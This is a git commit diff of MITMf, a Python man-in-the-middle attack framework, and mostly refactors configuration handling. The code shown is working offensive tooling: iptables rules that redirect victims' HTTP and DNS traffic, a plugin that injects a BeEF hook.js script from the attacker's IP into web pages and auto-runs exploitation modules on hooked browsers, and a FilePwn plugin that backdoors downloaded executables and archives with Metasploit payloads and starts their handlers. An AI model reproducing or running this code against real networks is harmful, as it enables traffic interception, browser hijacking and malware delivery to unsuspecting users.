def isHstsBypass(self):
|
||||
return self.hsts
|
||||
|
||||
def isAppCachePoisoning(self):
|
||||
return self.app
|
||||
|
||||
def isSecureFavicon(self, client, url):
|
||||
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
|
||||
|
||||
def URLgetRealHost(self, host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
|
||||
if self.real.has_key(host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
|
||||
return self.real[host]
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
|
||||
|
||||
if self.getHstsConfig()[0].has_key(host):
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host]))
|
||||
return self.getHstsConfig()[0][host]
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
|
||||
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
|
||||
return host
|
||||
|
|
|
@ -20,18 +20,12 @@
|
|||
#
|
||||
|
||||
import os
|
||||
import random
|
||||
import linecache
|
||||
import sys
|
||||
import random
|
||||
import logging
|
||||
|
||||
def PrintException():
|
||||
exc_type, exc_obj, tb = sys.exc_info()
|
||||
f = tb.tb_frame
|
||||
lineno = tb.tb_lineno
|
||||
filename = f.f_code.co_filename
|
||||
linecache.checkcache(filename)
|
||||
line = linecache.getline(filename, lineno, f.f_globals)
|
||||
return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr, get_if_hwaddr
|
||||
|
||||
class SystemConfig:
|
||||
|
||||
|
@ -41,6 +35,25 @@ class SystemConfig:
|
|||
file.write(str(value))
|
||||
file.close()
|
||||
|
||||
@staticmethod
|
||||
def getIP(interface):
|
||||
try:
|
||||
ip_address = get_if_addr(interface)
|
||||
if (ip_address == "0.0.0.0") or (ip_address is None):
|
||||
sys.exit("[-] Interface {} does not have an assigned IP address".format(interface))
|
||||
|
||||
return ip_address
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e))
|
||||
|
||||
@staticmethod
|
||||
def getMAC(interface):
|
||||
try:
|
||||
mac_address = get_if_hwaddr(interface)
|
||||
return mac_address
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e))
|
||||
|
||||
class IpTables:
|
||||
|
||||
_instance = None
|
||||
|
@ -62,11 +75,11 @@ class IpTables:
|
|||
self.http = False
|
||||
|
||||
def HTTP(self, http_redir_port):
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port)
|
||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
|
||||
self.http = True
|
||||
|
||||
def DNS(self, ip, port):
|
||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port))
|
||||
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port))
|
||||
self.dns = True
|
||||
|
||||
class Banners:
|
||||
|
@ -122,6 +135,15 @@ class Banners:
|
|||
\/__/ \/__/ \/__/ \/__/ \/__/
|
||||
"""
|
||||
|
||||
banner5 = """
|
||||
███╗ ███╗██╗████████╗███╗ ███╗███████╗
|
||||
████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
|
||||
██╔████╔██║██║ ██║ ██╔████╔██║█████╗
|
||||
██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝
|
||||
██║ ╚═╝ ██║██║ ██║ ██║ ╚═╝ ██║██║
|
||||
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
|
||||
"""
|
||||
|
||||
def printBanner(self):
|
||||
banners = [self.banner1, self.banner2, self.banner3, self.banner4]
|
||||
banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5]
|
||||
print random.choice(banners)
|
|
@ -1 +0,0 @@
|
|||
Subproject commit d24a8c2237eaae372e60a47f175694e8afa07c32
|
62
mitmf.py
62
mitmf.py
|
@ -28,21 +28,16 @@ from twisted.internet import reactor
|
|||
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
from core.utils import Banners
|
||||
from core.utils import PrintException
|
||||
from configobj import ConfigObj
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr, get_if_hwaddr
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
from plugins import *
|
||||
plugin_classes = plugin.Plugin.__subclasses__()
|
||||
|
||||
try:
|
||||
import user_agents
|
||||
except ImportError:
|
||||
print "[-] user_agents library missing! User-Agent parsing will be disabled!"
|
||||
|
||||
mitmf_version = "0.9.6"
|
||||
mitmf_version = "0.9.6-dev"
|
||||
sslstrip_version = "0.9"
|
||||
sergio_version = "0.2.1"
|
||||
dnschef_version = "0.4"
|
||||
|
@ -75,6 +70,8 @@ sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a l
|
|||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||
|
||||
#Initialize plugins
|
||||
plugin_classes = plugin.Plugin.__subclasses__()
|
||||
|
||||
plugins = []
|
||||
try:
|
||||
for p in plugin_classes:
|
||||
|
@ -99,37 +96,6 @@ except NotImplementedError:
|
|||
|
||||
args = parser.parse_args()
|
||||
|
||||
try:
|
||||
configfile = ConfigObj(args.configfile)
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config file: {}".format(e))
|
||||
|
||||
config_args = configfile['MITMf']['args']
|
||||
if config_args:
|
||||
print "[*] Loading arguments from config file"
|
||||
for arg in config_args.split(' '):
|
||||
sys.argv.append(arg)
|
||||
args = parser.parse_args()
|
||||
|
||||
####################################################################################################
|
||||
|
||||
# Here we check for some variables that are very commonly used, and pass them down to the plugins
|
||||
try:
|
||||
args.ip_address = get_if_addr(args.interface)
|
||||
if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
|
||||
sys.exit("[-] Interface {} does not have an assigned IP address".format(args.interface))
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving interface IP address: {}".format(e))
|
||||
|
||||
try:
|
||||
args.mac_address = get_if_hwaddr(args.interface)
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving interface MAC address: {}".format(e))
|
||||
|
||||
args.configfile = configfile #so we can pass the configobj down to all the plugins
|
||||
|
||||
####################################################################################################
|
||||
|
||||
log_level = logging.__dict__[args.log_level.upper()]
|
||||
|
||||
#Start logging
|
||||
|
@ -158,11 +124,9 @@ for p in plugins:
|
|||
print "| |_ {}".format(line)
|
||||
p.tree_output.remove(line)
|
||||
|
||||
if getattr(args, p.optname):
|
||||
p.initialize(args)
|
||||
load.append(p)
|
||||
|
||||
if vars(args)[p.optname] is True:
|
||||
if hasattr(p, 'tree_output') and p.tree_output:
|
||||
for line in p.tree_output:
|
||||
print "| |_ {}".format(line)
|
||||
|
@ -170,21 +134,15 @@ for p in plugins:
|
|||
#Plugins are ready to go, start MITMf
|
||||
if args.disproxy:
|
||||
ProxyPlugins.getInstance().setPlugins(load)
|
||||
DNSChef.getInstance().start()
|
||||
else:
|
||||
|
||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
|
||||
URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver'])
|
||||
URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port'])
|
||||
|
||||
DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS'])
|
||||
if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on':
|
||||
DNSChef.getInstance().startTCP()
|
||||
else:
|
||||
DNSChef.getInstance().startUDP()
|
||||
DNSChef.getInstance().start()
|
||||
|
||||
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
||||
ProxyPlugins.getInstance().setPlugins(load)
|
||||
|
@ -195,11 +153,13 @@ else:
|
|||
reactor.listenTCP(args.listen, strippingFactory)
|
||||
|
||||
#load custom reactor options for plugins that have the 'plugin_reactor' attribute
|
||||
for p in plugins:
|
||||
if getattr(args, p.optname):
|
||||
for p in load:
|
||||
if hasattr(p, 'plugin_reactor'):
|
||||
p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
|
||||
|
||||
if hasattr(p, 'startConfigWatch'):
|
||||
p.startConfigWatch()
|
||||
|
||||
print "|"
|
||||
print "|_ Sergio-Proxy v{} online".format(sergio_version)
|
||||
print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
|
||||
|
|
|
@ -29,6 +29,7 @@ import sys
|
|||
from plugins.plugin import Plugin
|
||||
from datetime import date
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
|
@ -47,18 +48,16 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.urlMonitor.setAppCachePoisoning()
|
||||
|
||||
try:
|
||||
self.config = options.configfile['AppCachePoison']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
|
||||
self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request
|
||||
url = request.client.uri
|
||||
req_headers = request.client.getAllHeaders()
|
||||
headers = request.client.responseHeaders
|
||||
ip = request.client.getClientIP()
|
||||
|
||||
#########################################################################
|
||||
|
||||
if "enable_only_in_useragents" in self.config:
|
||||
regexp = self.config["enable_only_in_useragents"]
|
||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||
|
|
|
@ -24,16 +24,15 @@ import json
|
|||
import threading
|
||||
|
||||
from core.beefapi.beefapi import BeefAPI
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from time import sleep
|
||||
|
||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||
requests_log.setLevel(logging.WARNING)
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class BeefAutorun(Inject, Plugin):
|
||||
class BeefAutorun(Inject, Plugin, ConfigWatcher):
|
||||
name = "BeEFAutorun"
|
||||
optname = "beefauto"
|
||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||
|
@ -44,94 +43,89 @@ class BeefAutorun(Inject, Plugin):
|
|||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.ip_address = options.ip_address
|
||||
|
||||
try:
|
||||
beefconfig = options.configfile['MITMf']['BeEF']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
|
||||
|
||||
try:
|
||||
userconfig = options.configfile['BeEFAutorun']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
|
||||
|
||||
self.Mode = userconfig['mode']
|
||||
self.All_modules = userconfig["ALL"]
|
||||
self.Targeted_modules = userconfig["targets"]
|
||||
self.ip_address = SystemConfig.getIP(options.interface)
|
||||
|
||||
Inject.initialize(self, options)
|
||||
self.black_ips = []
|
||||
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.ip_address, beefconfig['beefport'])
|
||||
|
||||
beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||
if not beef.login(beefconfig['user'], beefconfig['pass']):
|
||||
sys.exit("[-] Error logging in to BeEF!")
|
||||
self.onConfigChange()
|
||||
|
||||
self.tree_output.append("Mode: %s" % self.Mode)
|
||||
|
||||
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
|
||||
t = threading.Thread(name="autorun", target=self.autorun, args=())
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def autorun(self, beef):
|
||||
def onConfigChange(self):
|
||||
|
||||
beefconfig = self.config['MITMf']['BeEF']
|
||||
|
||||
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
||||
|
||||
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
||||
sys.exit("[-] Error logging in to BeEF!")
|
||||
|
||||
self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
||||
|
||||
def autorun(self):
|
||||
already_ran = []
|
||||
already_hooked = []
|
||||
|
||||
while True:
|
||||
sessions = beef.sessions_online()
|
||||
mode = self.config['BeEFAutorun']['mode']
|
||||
sessions = self.beef.sessions_online()
|
||||
if (sessions is not None and len(sessions) > 0):
|
||||
for session in sessions:
|
||||
|
||||
if session not in already_hooked:
|
||||
info = beef.hook_info(session)
|
||||
mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||
info = self.beef.hook_info(session)
|
||||
mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||
already_hooked.append(session)
|
||||
self.black_ips.append(str(info['ip']))
|
||||
|
||||
if self.Mode == 'oneshot':
|
||||
if mode == 'oneshot':
|
||||
if session not in already_ran:
|
||||
self.execModules(session, beef)
|
||||
self.execModules(session)
|
||||
already_ran.append(session)
|
||||
|
||||
elif self.Mode == 'loop':
|
||||
self.execModules(session, beef)
|
||||
elif mode == 'loop':
|
||||
self.execModules(session)
|
||||
sleep(10)
|
||||
|
||||
else:
|
||||
sleep(1)
|
||||
|
||||
def execModules(self, session, beef):
|
||||
session_info = beef.hook_info(session)
|
||||
def execModules(self, session):
|
||||
session_info = self.beef.hook_info(session)
|
||||
session_ip = session_info['ip']
|
||||
hook_browser = session_info['name']
|
||||
hook_os = session_info['os']
|
||||
all_modules = self.config['BeEFAutorun']["ALL"]
|
||||
targeted_modules = self.config['BeEFAutorun']["targets"]
|
||||
|
||||
if len(self.All_modules) > 0:
|
||||
mitmf_logger.info("%s >> sending generic modules" % session_ip)
|
||||
for module, options in self.All_modules.iteritems():
|
||||
mod_id = beef.module_id(module)
|
||||
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||
if len(all_modules) > 0:
|
||||
mitmf_logger.info("{} >> sending generic modules".format(session_ip))
|
||||
for module, options in all_modules.iteritems():
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
||||
|
||||
mitmf_logger.info("%s >> sending targeted modules" % session_ip)
|
||||
for os in self.Targeted_modules:
|
||||
mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
|
||||
for os in targeted_modules:
|
||||
if (os in hook_os) or (os == hook_os):
|
||||
browsers = self.Targeted_modules[os]
|
||||
browsers = targeted_modules[os]
|
||||
if len(browsers) > 0:
|
||||
for browser in browsers:
|
||||
if browser == hook_browser:
|
||||
modules = self.Targeted_modules[os][browser]
|
||||
modules = targeted_modules[os][browser]
|
||||
if len(modules) > 0:
|
||||
for module, options in modules.iteritems():
|
||||
mod_id = beef.module_id(module)
|
||||
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
||||
|
|
|
@ -54,7 +54,7 @@ class BrowserProfiler(Inject, Plugin):
|
|||
if self.dic_output['plugin_list'] > 0:
|
||||
self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
|
||||
pretty_output = pformat(self.dic_output)
|
||||
mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
|
||||
mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output))
|
||||
|
||||
def get_payload(self):
|
||||
payload = """<script type="text/javascript">
|
||||
|
|
|
@ -63,18 +63,20 @@ import random
|
|||
import string
|
||||
import tarfile
|
||||
import multiprocessing
|
||||
import threading
|
||||
|
||||
from libs.bdfactory import pebin
|
||||
from libs.bdfactory import elfbin
|
||||
from libs.bdfactory import machobin
|
||||
from core.msfrpc import Msfrpc
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from plugins.plugin import Plugin
|
||||
from tempfile import mkstemp
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class FilePwn(Plugin):
|
||||
class FilePwn(Plugin, ConfigWatcher):
|
||||
name = "FilePwn"
|
||||
optname = "filepwn"
|
||||
desc = "Backdoor executables being sent over http using bdfactory"
|
||||
|
@ -110,21 +112,8 @@ class FilePwn(Plugin):
|
|||
#NOT USED NOW
|
||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||
|
||||
#Metasploit options
|
||||
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||
rpcip = msfcfg['rpcip']
|
||||
rpcpass = msfcfg['rpcpass']
|
||||
|
||||
try:
|
||||
self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||
self.msf.login('msf', rpcpass)
|
||||
version = self.msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v%s" % version)
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
#FilePwn options
|
||||
self.userConfig = options.configfile['FilePwn']
|
||||
self.userConfig = self.config['FilePwn']
|
||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||
|
@ -138,9 +127,21 @@ class FilePwn(Plugin):
|
|||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||
|
||||
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||
#Metasploit options
|
||||
msfcfg = self.config['MITMf']['Metasploit']
|
||||
rpcip = msfcfg['rpcip']
|
||||
rpcpass = msfcfg['rpcpass']
|
||||
|
||||
jobs = self.msf.call('job.list')
|
||||
try:
|
||||
msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||
msf.login('msf', rpcpass)
|
||||
version = msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||
jobs = msf.call('job.list')
|
||||
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
||||
cmd = "use exploit/multi/handler\n"
|
||||
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
||||
|
@ -150,19 +151,22 @@ class FilePwn(Plugin):
|
|||
|
||||
if jobs:
|
||||
for pid, name in jobs.iteritems():
|
||||
info = self.msf.call('job.info', [pid])
|
||||
info = msf.call('job.info', [pid])
|
||||
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
|
||||
#Create a virtual console
|
||||
c_id = self.msf.call('console.create')['id']
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
self.msf.call('console.write', [c_id, cmd])
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
else:
|
||||
#Create a virtual console
|
||||
c_id = self.msf.call('console.create')['id']
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
self.msf.call('console.write', [c_id, cmd])
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
|
||||
def onConfigChange(self):
|
||||
self.initialize(self.options)
|
||||
|
||||
def convert_to_Bool(self, aString):
|
||||
if aString.lower() == 'true':
|
||||
|
@ -351,7 +355,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||
print "[!] TarFile over allowed size"
|
||||
mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
||||
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
|
||||
|
@ -423,7 +427,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if keywordCheck is True:
|
||||
print "[!] Tar blacklist enforced!"
|
||||
mitmf_logger.info('Tar blacklist enforced on %s', info.name)
|
||||
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
||||
continue
|
||||
|
||||
# Try to patch
|
||||
|
@ -444,14 +448,14 @@ class FilePwn(Plugin):
|
|||
info.size = os.stat(file2).st_size
|
||||
with open(file2, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
|
||||
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
with open(tmp.name, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||
mitmf_logger.info("Met Tar config patchCount limit.")
|
||||
|
||||
|
@ -479,7 +483,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||
print "[!] ZipFile over allowed size"
|
||||
mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
|
||||
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
||||
self.patched.put(aZipFile)
|
||||
return
|
||||
|
||||
|
@ -536,7 +540,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if keywordCheck is True:
|
||||
print "[!] Zip blacklist enforced!"
|
||||
mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
|
||||
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
||||
continue
|
||||
|
||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||
|
@ -546,12 +550,12 @@ class FilePwn(Plugin):
|
|||
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||
print "[*] Patching complete, adding to zip file."
|
||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||
mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
|
||||
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
||||
|
||||
print '-' * 10
|
||||
|
||||
|
@ -595,7 +599,7 @@ class FilePwn(Plugin):
|
|||
if content_header in self.zipMimeTypes:
|
||||
|
||||
if self.bytes_have_format(data, 'zip'):
|
||||
mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
|
||||
process.daemon = True
|
||||
|
@ -604,13 +608,13 @@ class FilePwn(Plugin):
|
|||
bd_zip = self.patched.get()
|
||||
|
||||
if bd_zip:
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_zip}
|
||||
|
||||
else:
|
||||
for tartype in ['gz','bz','tar']:
|
||||
if self.bytes_have_format(data, tartype):
|
||||
mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
||||
process.daemon = True
|
||||
|
@ -619,14 +623,14 @@ class FilePwn(Plugin):
|
|||
bd_tar = self.patched.get()
|
||||
|
||||
if bd_tar:
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_tar}
|
||||
|
||||
|
||||
elif content_header in self.binaryMimeTypes:
|
||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||
if self.bytes_have_format(data, bintype):
|
||||
mitmf_logger.info("%s Detected supported binary type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
|
||||
fd, tmpFile = mkstemp()
|
||||
with open(tmpFile, 'w') as f:
|
||||
f.write(data)
|
||||
|
@ -640,9 +644,9 @@ class FilePwn(Plugin):
|
|||
if patchb:
|
||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_binary}
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
|
||||
mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
||||
return {'request': request, 'data': data}
|
|
@ -19,12 +19,15 @@
|
|||
#
|
||||
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
import time
|
||||
import re
|
||||
import sys
|
||||
import argparse
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
|
@ -42,7 +45,7 @@ class Inject(CacheKill, Plugin):
|
|||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.proxyip = options.ip_address
|
||||
self.proxyip = SystemConfig.getIP(options.interface)
|
||||
self.html_src = options.html_url
|
||||
self.js_src = options.js_url
|
||||
self.rate_limit = options.rate_limit
|
||||
|
|
|
@ -24,7 +24,7 @@ import logging
|
|||
from plugins.plugin import Plugin
|
||||
from core.utils import IpTables
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
class HSTSbypass(Plugin):
|
||||
name = 'SSLstrip+'
|
||||
|
|
|
@ -25,7 +25,7 @@ from core.utils import SystemConfig, IpTables
|
|||
from core.sslstrip.DnsCache import DnsCache
|
||||
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
|
||||
from plugins.plugin import Plugin
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import *
|
||||
|
|
|
@ -11,10 +11,6 @@ class Plugin(object):
|
|||
implements = []
|
||||
has_opts = False
|
||||
|
||||
def __init__(self):
|
||||
'''Called on plugin instantiation. Probably don't need this'''
|
||||
pass
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
|
|
@ -13,5 +13,6 @@ pefile
|
|||
ipy
|
||||
pyopenssl
|
||||
service_identity
|
||||
watchdog
|
||||
capstone
|
||||
pypcap
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue